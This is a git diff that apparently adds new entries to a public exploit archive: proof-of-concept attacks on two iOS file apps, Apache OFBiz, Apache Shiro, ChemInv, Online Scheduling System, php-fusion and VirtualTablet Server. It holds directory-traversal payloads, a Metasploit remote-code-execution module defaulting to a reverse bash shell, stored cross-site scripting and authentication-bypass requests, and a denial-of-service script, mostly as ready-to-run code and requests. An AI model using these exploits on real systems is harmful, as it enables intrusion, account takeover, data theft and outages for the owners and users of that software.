diff --git a/exploits/ios/webapps/48405.txt b/exploits/ios/webapps/48405.txt new file mode 100644 index 000000000..7800e2c3c --- /dev/null +++ b/exploits/ios/webapps/48405.txt @@ -0,0 +1,130 @@ +# Title: Super Backup 2.0.5 for iOS - Directory Traversal +# Author: Vulnerability Laboratory +# Date: 2020-04-30 +# Software: https://apps.apple.com/us/app/super-backup-export-import/id1052684097 +# CVE: N/A + +Document Title: +=============== +Super Backup v2.0.5 iOS - Directory Traversal Vulnerability + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2200 + +Common Vulnerability Scoring System: +==================================== +7.1 + +Product & Service Introduction: +=============================== +Backup all your iPhone or iPad contacts in 1 tap and export them. +Fastest way to restore contacts from PC or Mac. +Export by mailing the backed up contacts file to yourself. Export +contacts file to any other app on your device. +Export all contacts directly to your PC / Mac over Wifi, no software +needed! Restore any contacts directly from +PC / Mac. Restore contacts via mail. Get the ultimate contacts backup +app now. + +(Copy of the Homepage: +https://apps.apple.com/us/app/super-backup-export-import/id1052684097 ) + + +Affected Product(s): +==================== +Dropouts Technologies LLP +Product: Super Backup v2.0.5 + + +Vulnerability Disclosure Timeline: +================================== +2020-04-30: Public Disclosure (Vulnerability Laboratory) + + +Technical Details & Description: +================================ +A directory traversal web vulnerability has been discovered in the +official Super Backup v2.0.5 ios mobile web-application. +The vulnerability allows remote attackers to change the application path +in performed requests to compromise the local application +or file-system of a mobile device. Attackers are for example able to +request environment variables or a sensitive system path. + +The directory-traversal web vulnerability in the app is located in the +`list` and `download` module with the `path` parameter. +Attackers are able to change the path variable to request the local list +command. By changing the path parameter the validation +mechanism runs into a logic error that turns back the possibility to +request different pathes outside the basic import/export +folder. Thus way the attacker injects for example local path environment +varibales to compromise the local ios web-application. + +Exploitation of the directory traversal web vulnerability requires no +privileged web-application user account or user interaction. +Successful exploitation of the vulnerability results in information +leaking by unauthorized file access and mobile application compromise. + + +Proof of Concept (PoC): +======================= +The directory traversal vulnerability can be exploited by attackers with +access to the wifi interface in a local network without user interaction. +For security demonstration or to reproduce the security vulnerability +follow the provided information and steps below to continue. + + +PoC: Payloads +%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00 +/../../../../../../../../../../../../../../../../../../../../../../%00 +//.././%00 + + +PoC: Exploitation +http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00 +http://localhost/download?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00 + + +--- PoC Session Logs [GET]] --- +http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00 +Host: localhost +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +- +GET: HTTP/1.1 200 OK +Content-Length: 174 +Content-Type: application/json +Connection: Close +- +http://localhost/download?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00 +Host: localhost +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Connection: keep-alive +- +GET: HTTP/1.1 200 OK +Content-Length: 174 +Content-Type: application/json +Connection: Close +- +Opening the url allows to download the list file json with content path +output +[{"path":"../../../../../../../../../../../../ "size":21961}] + + +References: +http://localhost/list?path= +http://localhost/download?path= + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/ios/webapps/48406.txt b/exploits/ios/webapps/48406.txt new file mode 100644 index 000000000..d149b3932 --- /dev/null +++ b/exploits/ios/webapps/48406.txt @@ -0,0 +1,143 @@ +# Title: HardDrive 2.1 for iOS - Arbitrary File Upload +# Author: Vulnerability Laboratory +# Date: 2020-04-30 +# Software: https://apps.apple.com/ch/app/harddrive/id383226784 +# CVE: N/A + +Document Title: +=============== +HardDrive v2.1 iOS - Arbitrary File Upload Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2221 + + +Common Vulnerability Scoring System: +==================================== +7.4 + + +Product & Service Introduction: +=============================== +Store+Organize+Edit+Protect+Import+Download+View+Share your files right +from your iPhone! Transform your +iPhone/iPod touch into a real HardDrive with no extra cable or software. + +(Copy of the Homepage: https://apps.apple.com/ch/app/harddrive/id383226784 ) + + +Affected Product(s): +==================== +Sebastien BUET +HardDrive v2.1 - Apple iOS Mobile Web Application + + +Vulnerability Disclosure Timeline: +================================== +2020-04-29: Public Disclosure (Vulnerability Laboratory) + + +Technical Details & Description: +================================ +An arbitrary file upload web vulnerability has been discovered in the +official Air Sender v1.0.2 iOS mobile application. +The web vulnerability allows remote attackers to upload arbitrary files +to compromise for example the file system of a service. + +The arbitrary upload vulnerability is located in the within the +web-server configuration when using the upload module. +Remote attackers are able to bypass the local web-server configuration +by an upload of malicious webshells. Attackers +are able to inject own files with malicious `filen` values in the +`upload` POST method request to compromise the +mobile web-application. The application does not perform checks for +multiple file extensions. Thus allows an attacker +to upload for example to upload a html.js.png file. After the upload the +attacker requests the original url source +with the uploaded file and removes the unwanted extension to execute the +code in the unprotected web-frontend. + +The security risk of the vulnerability is estimated as high with a +common vulnerability scoring system count of 7.0. +Exploitation of the web vulnerability requires a low privilege ftp +application user account and no user interaction. +Successful exploitation of the arbitrary file upload web vulnerability +results in application or device compromise. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] ./upload + +Vulnerable File(s): +[+] file + + +Proof of Concept (PoC): +======================= +The arbitrary file upload web vulnerability can be exploited by remote +attackers without user interaction or privileged user accounts. +For security demonstration or to reproduce the web vulnerability follow +the provided information and steps below to continue. + + +PoC: Vulnerable Source (File Dir Listing Index) + +exploit.html.js +size: 256.7 Kb + + +PoC: Exploitation +http://localhost:50071/exploit.html.js + + +--- PoC Session Logs [POST] --- (file) +http://localhost:50071/ +Host: localhost:50071 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; +boundary=---------------------------9331569428946906291010349387 +Content-Length: 263181 +Origin: http://localhost:50071 +Connection: keep-alive +Referer: http://localhost:50071/ +file=exploit.html.js.png&button=Submit +POST: HTTP/1.1 200 OK +Accept-Ranges: bytes +Content-Length: 381654 +- +http://localhost:50071/exploit.html.js +Host: localhost:50071 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: image/webp,*/* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +- +http://localhost:50071/exploit.html +GET: HTTP/1.1 200 OK +Accept-Ranges: bytes +Content-Length: 366735 + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/java/webapps/48408.txt b/exploits/java/webapps/48408.txt new file mode 100644 index 000000000..9cf698878 --- /dev/null +++ b/exploits/java/webapps/48408.txt @@ -0,0 +1,29 @@ +# Exploit Title: Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover) +# Exploit Author: Faiz Ahmed Zaidi +# Vendor Homepage: [https://ofbiz.apache.org/security.html] +# Software Link: https://ofbiz.apache.org/download.html#security +# Version: Before 17.12.03 +# Tested on: Linux and Windows +# CVE : CVE-2019-0235 + +#Exploit Code: + + + +
+ + + + + + + +
+ + + + +After that do a password reset via forget password. +It's done :) \ No newline at end of file diff --git a/exploits/multiple/remote/48410.rb b/exploits/multiple/remote/48410.rb new file mode 100755 index 000000000..ca9223b39 --- /dev/null +++ b/exploits/multiple/remote/48410.rb @@ -0,0 +1,82 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Powershell + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Apache Shiro v1.2.4 Cookie RememberME Deserial RCE', + 'Description' => %q{ + This vulnerability allows remote attackers to execute arbitrary code on vulnerable + installations of Apache Shiro v1.2.4. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'L / l-codes[at]qq.com' # Metasploit module + ], + 'References' => + [ + ['CVE', '2016-4437'], + ['URL', 'https://github.com/Medicean/VulApps/tree/master/s/shiro/1'] + ], + 'Platform' => %w{ win unix }, + 'Arch' => [ ARCH_CMD ], + 'Targets' => + [ + [ + 'Unix Command payload', + 'Arch' => ARCH_CMD, + 'Platform' => 'unix', + 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'} + ], + [ + 'Windows Command payload', + 'Arch' => ARCH_CMD, + 'Platform' => 'win' + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jun 7 2016', + 'Privileged' => false, + 'DefaultOptions' => + { + 'WfsDelay' => 5 + } + ) + ) + register_options( + [ + OptString.new('TARGETURI', [ true, 'Base directory path', '/']) + ]) + end + + def aes_encrypt(payload) + aes = OpenSSL::Cipher.new('aes-128-cbc') + aes.encrypt + aes.key = Rex::Text.decode_base64('kPH+bIxk5D2deZiIxcaaaA==') + aes.random_iv + aes.update(payload) + aes.final + end + + def exploit + cmd = payload.encoded + vprint_status("Execute CMD: #{cmd}") + type = ( target.name == 'Unix Command payload' ? 'bash' : 'cmd' ) + java_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload('CommonsCollections2', cmd, modified_type: type) + ciphertext = aes_encrypt(java_payload) + base64_ciphertext = Rex::Text.encode_base64(ciphertext) + + send_request_cgi({ + 'uri' => target_uri.path, + 'method' => 'GET', + 'cookie' => "rememberMe=#{base64_ciphertext}" + }) + end + +end \ No newline at end of file diff --git a/exploits/php/webapps/48401.txt b/exploits/php/webapps/48401.txt new file mode 100644 index 000000000..b31fbef5c --- /dev/null +++ b/exploits/php/webapps/48401.txt @@ -0,0 +1,55 @@ +# Exploit Title: ChemInv 1.0 - Authenticated Persistent Cross-Site Scripting +# Exploit Author: Bobby Cooke +# Date: 2020-04-29 +# Software Link: https://github.com/tmorrell/cheminv +# Software Info: +# "Cheminv is a web-based chemical inventory system. This responsive database provides an accessible way to organize and order chemicals, and is provided as an open-source package for all non-commercial users." +# "Cheminv was created by Thomas Morrell for the Haw Yang Lab at Princeton University" +# "Cheminv is based on ecDB www.ecDB.net, which was created by Nils Fredriksson aka. ElectricMan and designed by Buildlog." +# Version: 1 +# Tested On: CentOS +# Vulnerability Type: +# ChemInv suffers from a persistent cross-site scripting vulnerability(XSS). This vulnerability can be exploited to have all users of the system, with read access to the project, execute malicious client-side code; every time the users views the 'Projects' or 'Add Chemicals' tab. +# The application's source code mitigates SQL injection (SQLi), but fails to sanitize HTML and JavaScript injections to the SQL database. + +# Vulnerable Source Code +## proj_list.php + 33 include('include/include_proj_add.php'); + 34 $AddProj = new ProjAdd; + 35 $AddProj->AddProj(); + 36 + 37 $proj_query = mysql_query("SELECT * FROM projects WHERE project_owner= $owner"); +## include/include_proj_add.php + 2 class ProjAdd { + 3 public function AddProj () { + 4 + 5 require_once('include/login/auth.php'); + 6 include('include/mysql_connect.php'); + 7 + 8 if(isset($_POST['submit'])) { + 9 $owner = $_SESSION['SESS_MEMBER_ID']; + 10 $name = mysql_real_escape_string($_POST['name']); + 11 + 12 if ($name == '') { + 13 echo '
'; + 14 echo 'You have to specify a name!'; + 15 echo '
'; + 16 } + 17 else { + 18 $sql="INSERT into projects (project_owner, project_name) VALUES ('$owner', '$name')"; + 19 $sql_exec = mysql_query($sql); + +# Malicious POST Request to https://TARGET/proj_list.php + POST /proj_list.php HTTP/1.1 + Host: TARGET + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Referer: https://TARGET/proj_list.php + Content-Type: application/x-www-form-urlencoded + Content-Length: 16 + Connection: close + Cookie: PHPSESSID=7af5kg3to8fstfum0to1ukpb85 + + name=evilProject&submit= \ No newline at end of file diff --git a/exploits/php/webapps/48403.txt b/exploits/php/webapps/48403.txt new file mode 100644 index 000000000..008a66ccf --- /dev/null +++ b/exploits/php/webapps/48403.txt @@ -0,0 +1,26 @@ +# Exploit Title: Online Scheduling System 1.0 - Persistent Cross-Site Scripting +# Exploit Author: Bobby Cooke +# Date: 2020-04-30 +# Vendor Homepage: https://www.sourcecodester.com/php/14168/online-scheduling-system.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip +# Version: 1.0 +# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 +# Vulnerability Info: +# Online Scheduling System v1.0 suffers from an authenticated persistent cross-site scripting vulnerability. This Proof of Concept (PoC) will cause all users of the system, with read access to the courses, to execute arbitrary client-side code when viewing the 'Home' and 'List' tabs within the web application. The application fails to sanitize arguments supplied by the user before inserting them into the SQL database. + +# Vulnerable Source Code +## /add.cor.php + 14 $Course_Code = $_POST['corcode']; + 15 $Course_name = $_POST['corname']; + 16 + 17 $sql = "INSERT INTO course (Course_Code, Course_name) VALUES ('$Course_Code', '$Course_name')"; + +# Malicious POST Request + POST /Online%20Scheduling%20System/add.cor.php HTTP/1.1 + Host: 172.16.65.130 + Referer: http://172.16.65.130/Online%20Scheduling%20System/addcourse.php + Content-Type: application/x-www-form-urlencoded + Connection: close + Cookie: PHPSESSID=8o12pka3gvais768f43v5q4d60 + + corcode=XSS-101&corname=%3Cscript%3Ealert%28%22XSS-101%22%29%3B%3C%2Fscript%3E&submit= \ No newline at end of file diff --git a/exploits/php/webapps/48404.txt b/exploits/php/webapps/48404.txt new file mode 100644 index 000000000..36428e78b --- /dev/null +++ b/exploits/php/webapps/48404.txt @@ -0,0 +1,102 @@ +# Exploit Title: php-fusion 9.03.50 - Persistent Cross-Site Scripting +# Google Dork: "php-fusion" +# Date: 2020-04-30 +# Exploit Author: SunCSR (Sun* Cyber Security Research) +# Vendor Homepage: https://www.php-fusion.co.uk/ +# Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30 +# Version: 9.03.50 +# Tested on: Windows +# CVE : N/A + +### Vulnerability : Persistent Cross-Site Scripting + +###Describe the bug +Persistent Cross-site scripting (Stored XSS) vulnerabilities in PHP-Fusion 9.03.50 allow remote attackers to inject arbitrary web script or HTML +via the go parameter to /infusions/faq/faq_admin.php, /infusions/shoutbox_panel/shoutbox_admin.php + +###To Reproduce +Steps to reproduce the behavior: +Authenticated user submit Q&A or Shoutbox to admin + +### POC: +## Submit Q&A: + +POST /php-fusion/submit.php?stype=q HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------68756068726681644952075211938 +Content-Length: 1146 +Origin: http://TARGET +DNT: 1 +Connection: close +Referer: http://TARGET/php-fusion/submit.php?stype=q +Cookie: xxx +Upgrade-Insecure-Requests: 1 + +-----------------------------68756068726681644952075211938 +Content-Disposition: form-data; name="fusion_token" + +2-1588232750-f839ed0754d5dc8aa577cfb660e273e711ec03a9a782de90ac34860cdb45a8f1 +-----------------------------68756068726681644952075211938 +Content-Disposition: form-data; name="form_id" + +submit_form +-----------------------------68756068726681644952075211938 +Content-Disposition: form-data; name="fusion_PR57qY" + + +-----------------------------68756068726681644952075211938 +Content-Disposition: form-data; name="faq_question" + +Question XSS +-----------------------------68756068726681644952075211938 +Content-Disposition: form-data; name="faq_answer" + +xss +-----------------------------68756068726681644952075211938 +Content-Disposition: form-data; name="faq_cat_id" + +1 +-----------------------------68756068726681644952075211938 +Content-Disposition: form-data; name="faq_language[]" + +English +-----------------------------68756068726681644952075211938 +Content-Disposition: form-data; name="submit_link" + +Submit +-----------------------------68756068726681644952075211938-- + +## Shoutbox + +POST /php-fusion/infusions/downloads/downloads.php?cat_id=1 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 272 +Origin: http://TARGET +DNT: 1 +Connection: close +Referer: http://TARGET/php-fusion/infusions/downloads/downloads.php?cat_id=1 +Cookie: xxx +Upgrade-Insecure-Requests: 1 + +fusion_token=2-1588233429-3df5ba2b9c690e833548645f66a7772cf7fdb24ca9be130d5ff01e26351a2771&form_id=sbpanel&fusion_gEHiPs=&shout_id=0 +&shout_hidden=&shout_message=xss&shout_language=English&shout_box=Save+Shout + + +###Reference: +https://github.com/php-fusion/PHP-Fusion/issues/2306 + +### History +============= +2020-04-09 Issue discovered +2020-04-14 Vendor contacted +2020-04-28 Vendor response and hotfix +2020-04-29 Vendor releases fixed \ No newline at end of file diff --git a/exploits/php/webapps/48409.txt b/exploits/php/webapps/48409.txt new file mode 100644 index 000000000..73ff77f28 --- /dev/null +++ b/exploits/php/webapps/48409.txt @@ -0,0 +1,15 @@ +# Exploit Title: Online Scheduling System 1.0 - Authentication Bypass +# Exploit Author: Bobby Cooke +# Date: 2020-04-30 +# Vendor Homepage: https://www.sourcecodester.com/php/14168/online-scheduling-system.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip +# Version: 1.0 +# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 + +# Malicious POST Request to https://TARGET/Online%20Scheduling%20System/login.php HTTP/1.1 + POST /Online%20Scheduling%20System/login.php HTTP/1.1 + Host: TARGET + Connection: close + Cookie: PHPSESSID=8o12pka3gvais768f43v5q4d60 + + username=0&password=0&lgn=Login \ No newline at end of file diff --git a/exploits/windows/dos/48402.py b/exploits/windows/dos/48402.py new file mode 100755 index 000000000..d7049773f --- /dev/null +++ b/exploits/windows/dos/48402.py @@ -0,0 +1,28 @@ +# Title: VirtualTablet Server 3.0.2 - Denial of Service (PoC) +# Author: Dolev Farhi +# Date: 2020-04-29 +# Vulnerable version: 3.0.2 (14) +# Link: http://www.sunnysidesoft.com/ +# CVE: N/A + + +from thrift import Thrift +from thrift.transport import TSocket +from thrift.transport import TTransport +from thrift.protocol import TBinaryProtocol +from pygen.example import Example + +host = '192.168.1.1' +port = 57110 + +try: + transport = TSocket.TSocket(host, port) + transport = TTransport.TBufferedTransport(transport) + protocol = TBinaryProtocol.TBinaryProtocol(transport) + client = Example.Client(protocol) + transport.open() + client.send_say('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA') + transport.close() + +except Thrift.TException as tx: + print(tx.message) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 3ec66afac..95fd3e845 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6729,6 +6729,7 @@ id,file,description,date,author,type,platform,port 48304,exploits/hardware/dos/48304.py,"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)",2020-04-08,"Jacob Baines",dos,hardware, 48305,exploits/windows/dos/48305.py,"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)",2020-04-10,chuyreds,dos,windows, 48342,exploits/hardware/dos/48342.txt,"Cisco IP Phone 11.7 - Denial of service (PoC)",2020-04-17,"Jacob Baines",dos,hardware, +48402,exploits/windows/dos/48402.py,"VirtualTablet Server 3.0.2 - Denial of Service (PoC)",2020-05-01,"Dolev Farhi",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -18134,6 +18135,7 @@ id,file,description,date,author,type,platform,port 48353,exploits/linux/remote/48353.rb,"Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)",2020-04-20,Metasploit,remote,linux, 48363,exploits/windows/remote/48363.py,"Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption",2020-04-21,hyp3rlinx,remote,windows, 48389,exploits/windows/remote/48389.py,"CloudMe 1.11.2 - Buffer Overflow (PoC)",2020-04-28,"Andy Bowden",remote,windows, +48410,exploits/multiple/remote/48410.rb,"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)",2020-05-01,Metasploit,remote,multiple, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -42635,3 +42637,10 @@ id,file,description,date,author,type,platform,port 48394,exploits/php/webapps/48394.txt,"School ERP Pro 1.0 - Arbitrary File Read",2020-04-29,Besim,webapps,php, 48395,exploits/ios/webapps/48395.txt,"Easy Transfer 1.7 for iOS - Directory Traversal",2020-04-29,Vulnerability-Lab,webapps,ios, 48399,exploits/php/webapps/48399.txt,"hits script 1.0 - 'item_name' SQL Injection",2020-04-29,SajjadBnd,webapps,php, +48401,exploits/php/webapps/48401.txt,"ChemInv 1.0 - Authenticated Persistent Cross-Site Scripting",2020-05-01,boku,webapps,php, +48403,exploits/php/webapps/48403.txt,"Online Scheduling System 1.0 - Persistent Cross-Site Scripting",2020-05-01,boku,webapps,php, +48404,exploits/php/webapps/48404.txt,"php-fusion 9.03.50 - Persistent Cross-Site Scripting",2020-05-01,SunCSR,webapps,php, +48405,exploits/ios/webapps/48405.txt,"Super Backup 2.0.5 for iOS - Directory Traversal",2020-05-01,Vulnerability-Lab,webapps,ios, +48406,exploits/ios/webapps/48406.txt,"HardDrive 2.1 for iOS - Arbitrary File Upload",2020-05-01,Vulnerability-Lab,webapps,ios, +48408,exploits/java/webapps/48408.txt,"Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)",2020-05-01,"Faiz Ahmed Zaidi",webapps,java, +48409,exploits/php/webapps/48409.txt,"Online Scheduling System 1.0 - Authentication Bypass",2020-05-01,boku,webapps,php,